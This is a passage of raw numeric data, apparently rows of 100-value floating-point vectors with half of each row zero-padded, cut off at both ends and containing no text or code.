-0.1747, -0.05593, -0.0359449, 0.528949, -0.033689, 0.563513, -0.188641, 0.0333402, 0.0151033, 0.00195994, -0.0564992, -0.234697, 0.704199, 0.432101, 0.215732, 0.310275, -0.451169, -0.152856, 0.407915, 0.834554, 0.396813, 0.106043, -0.448964, 0.386099, -0.186383, -0.494229, 0.0411979, 0.5437, -0.28208, -0.23376, -0.159808, 0.345462, 0.629489, 0.0909301, 0.262915, -0.0140547, 0.0703901, 0.0870268, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0862763, 0.214661, -0.205132, -0.509698, -0.282893, -0.335409, -0.00281651, -0.0387833, 0.360551, -0.161184, 0.161555, 0.168777, -0.386635, 0.48953, -0.143622, -0.0548127, -0.823233, 0.0457209, 0.337856, -0.0091643, -0.0245709, 0.311056, 0.158591, 0.0588856, 0.0291222, 0.648995, -0.0892552, -0.0068762, -0.21661, -0.359363, -0.204125, 0.873177, -0.154894, -0.244434, 0.0870704, -0.251864, 0.241553, -0.636653, -0.419285, -0.0852114, -0.0273586, -0.245365, 0.315057, -0.396354, -0.172202, -0.70493, 0.488111, 0.0219731, -0.0403008, 0.198957, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.775, -0.4153, -0.325, 0.11206, -0.743, -0.7847, -0.7783, -0.357, -0.3572, -0.2256, 0.8965, -0.5527, -0.137, -0.2322, -0.4985, 0.4338, 1.434, -0.74, -1.06, -0.02292, 0.3357, -0.5933, -0.3743, -2.31, 0.2925, 1.002, 0.1504, -1.8955, -0.1383, -0.487, -0.686, -2.055, 0.519, 0.3054, 0.1713, 0.0961, 0.7974, -1.245, -0.736, 0.805, -0.1746, -0.1095, -0.208, -1.695, -1.001, -0.2129, -0.881, 0.002888, -0.05875, 0.3933], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.29, -0.03906, -0.2354, -0.03415, -0.10144, -0.01044, -0.1532, 0.1461, 0.02034, 0.02051, -0.2045, 0.2296, -0.09644, 0.0688, 0.00507, -0.1898, 0.2593, -0.2717, 0.01345, -0.02364, -0.001004, 0.07086, -0.076, -0.1582, 0.08344, -0.007057, -0.02957, -0.09186, -0.007835, 0.01572, -0.3687, 0.2593, 0.512, 0.04703, 0.0245, 0.01399, -0.249, -0.1415, 0.06335, 0.1648, -0.1586, 0.1544, -0.1455, -0.1852, -0.02432, 0.546, -0.05106, 0.02898, 0.09436, 0.2444], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0992, -0.03665, 0.0755, 0.446, -0.179, -0.003029, 0.1338, -0.11163, 0.3823, 0.4194, -0.1648, -0.11163, 0.014046, -0.164, -0.2734, -0.05038, -0.1594, -0.1283, -0.1274, 0.02834, -0.08527, -0.3398, -0.01018, -0.0475, -0.296, -0.04236, 0.02834, -0.1705, -0.1997, -0.0786, -0.03047, 0.1416, 0.1153, 0.04245, -0.0896, 0.007713, -0.0468, -0.293, 0.0593, 0.1698, -0.02592, -0.134, -0.01156, 0.0412, 0.0758, -0.177, -0.01255, -0.01744, 0.1356, 0.03857], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.606, -0.2852, 1.463, -0.355, 0.363, 0.227, -0.7676, -2.104, -0.3958, 1.314, -1.756, 1.216, 0.3047, 0.06793, -0.4333, 1.424, -0.496, 0.1763, 0.1375, 0.003029, -0.7437, -0.2751, 0.161, 0.4504, 0.9434, 0.2081, -0.4136, 1.157, -0.1357, -0.2483, 0.26, -1.364, -1.373, 0.5283, 0.1482, 0.1624, 0.1709, -0.1891, -0.0934, -0.02731, 0.3472, 0.2969, 0.4348, 1.459, 0.609, -1.538, 0.02306, 0.04095, 0.03262, 0.3625], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6704, 0.711, 1.287, -0.882, 0.02585, 0.903, -0.538, -0.1747, 0.2083, -0.2932, 0.519, -0.6226, 0.4097, 1.548, 1.2705, 0.1696, -1.907, -1.47, 0.02792, 0.045, 0.3552, -0.0628, -0.683, 0.3093, -0.6006, -1.02, 0.679, -2.227, 0.519, 0.08826, -0.9204, -2.588, 1.183, -0.2262, 0.361, -1.855, 0.692, 0.365, -0.5376, 0.1603, 0.0905, -0.6978, 0.963, 0.8667, 1.893, -1.294, 0.939, -0.013306, 0.755, -0.0373], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.12103, -0.11255, -0.332, 0.05768, -0.0953, 0.0641, -0.03802, 0.06915, 0.03943, 0.04324, 0.1776, -0.323, -0.0773, 0.011284, -0.0407, 0.0783, 0.3171, -0.04025, -0.1323, 0.04858, 0.052, -0.08936, -0.1218, -0.2203, 0.1725, 0.02106, -0.1056, -0.1294, 0.03105, -0.0714, 0.1608, 0.1882, 0.398, 0.02591, -0.1852, 0.2402, 0.04248, -0.1667, 0.088, 0.3218, -0.00452, -0.06635, -0.05438, 0.03738, 0.1805, 0.3733, -0.0776, 0.02304, -0.0942, 0.2075], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2489, 0.09827, 0.0847, 0.487, 0.05466, 0.2135, 0.01208, 0.4497, -0.2866, -0.458, -0.1879, -0.2264, 0.1866, 0.1179, -0.01207, 0.2566, -0.1731, -0.1342, -0.05603, -0.00453, -0.1923, -0.0885, 0.0402, 0.03986, 0.7373, -0.1722, -0.0685, -0.000752, 0.08527, 0.213, 0.3706, -0.3657, 0.3225, 0.189, 0.159, -0.106, -0.04468, -0.2416, 0.0157, 0.03928, 0.05768, -0.01279, -0.2354, -0.3171, -0.2164, -0.3057, 0.04413, 0.0337, -0.07227, 0.1245], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3933, -0.2052, -0.3584, -0.1818, -0.2086, -0.2656, 0.3384, 0.3877, 0.803, 0.02977, 0.2449, -0.2124, -0.3303, -0.1943, 0.6855, -0.2123, 0.0727, -0.05243, 0.09, -0.02002, 0.1813, 0.9365, 0.0974, -0.2632, -0.06555, -0.2568, -0.0619, -0.0968, 0.3032, 0.0429, -0.10913, 0.4805, 0.5527, 0.1371, 0.4824, -0.0327, 0.1536, -0.01659, -0.2235, 0.71, 0.0423, -0.1101, -0.1142, 0.11053, -0.3755, 0.1428, -0.1603, -0.02127, 0.1349, -0.4062], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0819, -0.1776, -0.292, 0.359, -0.02063, -0.1548, -0.0579, 0.0736, -0.117, -0.3718, -0.273, -0.3613, 0.1082, 0.1825, 0.2527, -0.2335, 0.3574, 0.1912, -0.1494, -0.02388, 0.06506, 0.4192, -0.09357, -0.12067, 1.119, 0.3704, -0.1824, 0.6587, 0.0998, -0.144, 0.268, -0.2898, 0.5317, -0.1483, 0.1776, -0.1302, 0.0292, -0.3765, -0.2218, -0.08, -0.495, -0.05374, -0.3054, 0.625, -0.02094, 0.1508, -0.1566, 0.02116, -0.3584, 0.05008], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1948, 0.3728, -0.1361, 0.11566, -0.5645, 0.4578, 0.2284, 0.6157, 0.42, -0.4001, 2.256, 0.3875, -1.021, -0.0318, -1.053, 0.2354, -0.2, 0.4534, 0.11414, -0.03075, -0.0712, 0.655, 0.01973, -1.117, 0.2783, -0.0716, 0.1304, 0.418, -0.4968, -0.588, 0.04727, -0.2345, -0.0925, -0.5806, 0.2189, 0.2443, 0.817, -0.605, -0.594, -0.5044, -1.771, -0.7603, 0.1456, -0.3418, -0.2927, 0.3887, 0.677, 0.02165, -0.02098, -0.06323], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6577, -0.236, -0.4783, -0.03047, -0.3738, 0.1978, 0.00821, 0.4717, 0.7007, 0.1306, -1.415, 0.09186, -0.10394, 0.04483, -0.1421, 0.4048, 0.523, 0.6626, -0.3564, 0.04642, 0.1959, 0.6846, -0.203, -0.2222, 1.343, -0.4192, -0.1051, -0.5073, 0.0592, -0.0714, -0.1371, 0.534, 0.1611, -0.3647, -0.2151, 0.585, -0.01637, -0.1387, 0.4822, -0.04886, -0.6177, 0.1624, -0.186, -0.1211, 0.982, 0.2793, -0.03424, -0.04288, 0.3738, -0.4102], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5103, 0.09033, 0.3735, 0.1948, -0.1389, 0.1824, 0.1335, -0.579, 0.2874, -0.1274, 0.2546, -0.674, 0.292, -0.4167, -0.562, 0.4072, -0.5674, 0.4937, 0.2043, 0.03568, -0.3105, -0.2053, 0.142, 0.2903, -0.8096, 0.2446, 0.1992, 0.616, -0.4163, 0.2472, -0.1268, 0.05493, -0.5186, -0.2101, -0.2161, -0.1375, 0.101, 0.10345, -0.2115, -0.0334, -0.003069, -0.339, 0.344, 0.00628, 0.593, -0.7144, 0.03635, -0.0182, -0.188, -0.12366], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.656, -0.381, -0.02853, -1.575, 0.8877, -0.3247, -0.8843, 0.6475, -2.822, -0.5913, 1.086, 0.2505, 0.06024, 0.5713, 1.09, -0.512, 0.2443, -1.53, 0.2532, 0.00834, -0.871, -0.8345, 0.2424, -0.01962, -1.341, -0.5503, -0.492, 0.08826, 0.754, 0.3643, -0.1277, -0.2169, -0.1167, -0.10394, 0.584, -0.558, 0.6816, 0.396, -0.669, -0.536, 0.617, 0.2524, 0.1788, 0.468, -0.2094, 1.015, 0.311, -0.03854, 0.364, -1.356], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06287, 0.1514, 0.08765, -0.4985, 0.4153, 0.1134, 0.09534, 0.00653, 0.722, 0.5737, 1.1045, -0.383, 0.02603, 0.7954, -0.6665, 0.3506, -0.1484, 0.01703, 0.06934, -0.003845, -0.1708, -0.2408, 0.1455, -1.104, 0.3008, -0.3713, 0.3455, 0.04282, 0.04285, 0.404, -0.0965, 1.083, -0.663, 0.1709, 0.3372, -0.871, -0.0401, -0.1877, -0.2192, 0.0567, -0.0701, -0.455, -0.4568, 0.838, 0.5356, 0.008965, -1.26, 0.03677, 0.1473, -0.4436], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02348, 0.02763, 0.01636, -0.007587, 0.03168, -0.05417, 0.00899, -0.0355, 0.0201, -0.02415, 0.03403, -0.04318, -0.05127, 0.00739, 0.01125, -0.02464, -0.0445, -0.05447, 0.0529, -0.04703, -0.03342, -0.02415, -0.05872, -0.03784, 0.01569, 0.04007, -0.04794, -0.01886, 0.03467, -0.0398, 0.00291, -0.006695, 0.0307, -0.01467, -0.04218, -0.04504, -0.005615, 0.001142, -0.01494, -0.006428, -0.03056, 0.01999, 0.0348, 0.03848, -0.03525, -0.0503, -0.04053, 0.04962, 0.00656, 0.007065], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5605, -1.062, -1.03, 4.176, -1.204, 1.194, -0.4602, 0.6025, 2.453, -0.425, -0.8647, -0.6177, -0.5186, -1.737, 0.8257, -0.3147, 1.777, 0.1901, -0.8745, -0.008736, 1.149, 2.21, -0.725, -1.314, 0.904, 1.243, -0.491, -1.64, -0.7056, -0.35, 1.216, 1.48, 2.158, 0.725, -0.8887, 2.514, -0.843, -0.555, 1.082, 1.756, -0.189, -0.5234, -0.772, 1.472, 1.977, 1.717, -0.03326, 0.0388, -0.8154, 1.456], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0662, -0.2834, 0.2441, -0.05276, 0.1647, -0.1895, 0.748, -0.1364, 0.2455, 0.7554, -1.279, -0.1034, 0.3125, -0.04544, 0.1824, -0.65, -0.048, 0.3777, 0.0514, 0.01689, -0.07446, -0.3992, 0.0566, 0.5884, 0.05682, 0.5977, -0.8325, -0.2297, -0.1145, 0.3767, 0.0425, -0.1416, 0.3108, 0.632, -0.2869, 0.0869, -0.03044, -0.169, -0.0921, 0.1488, 0.5044, 0.4346, -0.9004, 0.1907, -0.31, -0.0765, -0.2847, -0.05002, 0.342, 0.04996], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.453, -0.4316, -2.45, -0.05377, -1.71, 0.756, -1.344, 1.273, -0.004612, -0.8804, -1.094, 0.2593, -0.1505, 0.4106, -0.1509, -0.006844, -0.8037, 1.29, -0.45, -0.0161, 0.5796, 1.07, -0.557, -0.4102, 0.9634, -0.471, 0.7036, -0.614, -0.2585, 0.1329, -0.2118, -3.342, -1.59, -0.3484, 0.5303, 0.7627, -0.103, -3.527, 0.2815, -0.7866, -0.1368, -1.048, 0.947, -0.8467, 0.777, -0.0703, 0.3242, -0.02243, -0.611, -0.333], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1971, -0.752, 0.0752, -0.0003035, 0.0947, -0.226, 0.03622, -0.09674, 0.1619, -0.731, -0.9863, 0.24, 0.11426, -0.794, 0.404, 0.04797, 0.4604, 0.6577, -0.406, -0.04156, -0.231, 0.522, -0.2413, 0.1914, -0.6797, -0.392, -0.05197, -1.986, -0.4788, 0.1376, 0.2277, 0.1781, 0.3389, -0.07635, 0.307, 0.3455, 0.502, -0.10077, -0.3762, -0.1481, -1.089, 0.0601, -0.855, 0.655, 0.00413, 0.524, -0.3457, -0.01573, 0.2932, 0.0685], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06067, 0.06616, -0.1284, -0.04776, 0.2006, -0.1672, 0.1799, -0.1252, -0.0679, -0.009605, -0.2903, 0.1198, -0.09155, 0.04895, -0.0857, 0.05798, 0.04736, -0.10834, 0.02713, -0.02423, 0.01178, 0.2954, -0.04382, -0.1499, -0.1625, 0.4272, -0.1611, -0.3306, -0.0943, -0.1123, 0.1038, 0.5293, 0.3557, -0.3691, -0.2441, -0.3894, -0.377, -0.02766, -0.3105, -0.3638, 0.227, -0.08673, 0.04486, 0.01089, 0.1892, -0.2365, -0.1398, -0.03845, 0.09595, 0.1582], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2388, -0.4915, -0.3545, -0.3972, -0.2773, 0.2122, 0.637, 0.718, 0.3687, -0.834, 0.68, -0.1622, -0.4277, -0.2289, -0.4207, -0.1294, -0.6616, 0.9067, -0.7334, -0.008255, 0.119, -0.7935, -0.2178, -1.362, -0.867, 0.0804, 0.1173, 0.771, 0.3806, -0.422, -0.9395, 0.01794, -0.2334, -0.2297, 0.1337, 1.031, 0.1296, -0.02281, -0.2365, 0.269, -0.4363, -0.2448, 0.2935, 0.06805, 0.3528, 0.003641, 0.3127, 0.041, 0.3093, -0.2473], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.216, 0.449, 0.2494, 0.3096, -0.1545, 0.504, -0.322, 0.6343, 0.3938, -0.347, 2.031, -0.0432, -0.2267, -0.54, 1.065, -1.765, -0.2019, 0.1979, -0.0351, 0.01085, -0.2146, 1.755, -0.301, -0.3108, 0.3582, -0.7065, -1.92, -0.4395, 0.2023, -0.2372, -0.378, 1.436, 0.1737, -1.03, 2.045, 0.2747, -0.31, 0.352, -0.5366, -0.485, 0.788, -0.00906, 0.9736, -0.259, 0.491, 0.1693, -0.5186, 0.04553, -0.1741, -0.4648], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.236, -0.4585, -0.3198, -0.0633, 0.5464, 0.0985, -1.11, -1.311, 0.1433, -0.7114, -0.1976, -0.4163, -0.1711, -1.065, 0.4695, -0.9253, 0.11053, 0.04977, 0.5864, -0.01776, -0.588, 0.8887, -0.52, 0.907, 0.6226, 0.9785, -0.4556, -0.427, 0.4368, 0.2383, 0.473, 0.1542, 0.4277, -0.8335, -0.1512, -0.0631, -1.869, 0.601, -1.573, -0.7485, -0.2886, -0.1702, 0.378, 0.504, 0.409, 0.00536, -0.696, 0.02084, 0.753, -0.1327], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6055, 0.3428, -1.009, 0.5693, -0.383, 0.51, 0.1561, -0.612, 1.03, -0.8687, 1.173, -1.414, -0.6904, 0.0682, -0.1384, 0.9434, -0.2402, 0.5454, -0.4526, -0.01227, -0.3098, 0.3508, -0.02672, -0.9717, 0.448, 0.36, 0.2299, 0.3994, -0.6436, -0.363, 0.9727, 1.104, 0.3499, -0.1818, -0.03705, 0.4255, 1.282, -0.2798, -0.8486, -0.0509, -0.8726, -0.731, 0.4802, -0.2856, 0.9395, 0.493, 0.05338, -0.01188, -0.588, -0.3987], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4053, -0.3381, 0.614, 0.2107, -0.00828, -0.2002, -0.6313, 0.3772, 0.952, -0.9204, 0.7754, -0.1938, -0.04352, -0.2133, -1.8, 0.1451, -0.8027, -0.05676, -0.2656, 0.03638, -0.2937, 0.4348, -0.0334, -0.2583, 0.703, -0.11755, -0.11285, -0.31, 0.1096, -0.1943, -0.1067, -0.04395, 0.326, -0.4353, 0.12317, 0.4365, -0.01046, -0.2942, -0.01712, 0.1267, 0.8945, 0.2445, 0.3108, -0.02614, -0.005257, 0.0858, 0.1912, 0.04776, 0.2122, -0.0731], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.667, 0.272, 2.066, 0.3042, 0.787, 0.6597, -1.288, 0.2046, -0.2517, 0.508, -2.504, 0.07794, -0.06573, 0.2397, 1.286, 1.433, 0.5923, 0.1409, -0.010284, -0.02893, 0.1284, -0.4507, -0.854, -1.07, -1.37, -0.0922, -0.6353, -1.156, -0.3533, 0.2343, -0.4592, -0.9883, -2.055, 1.131, -1.329, 0.1008, 0.73, 1.044, 0.6255, 1.93, -0.667, 0.8228, -0.5264, -0.7656, 0.428, -0.49, -0.5405, 0.003222, 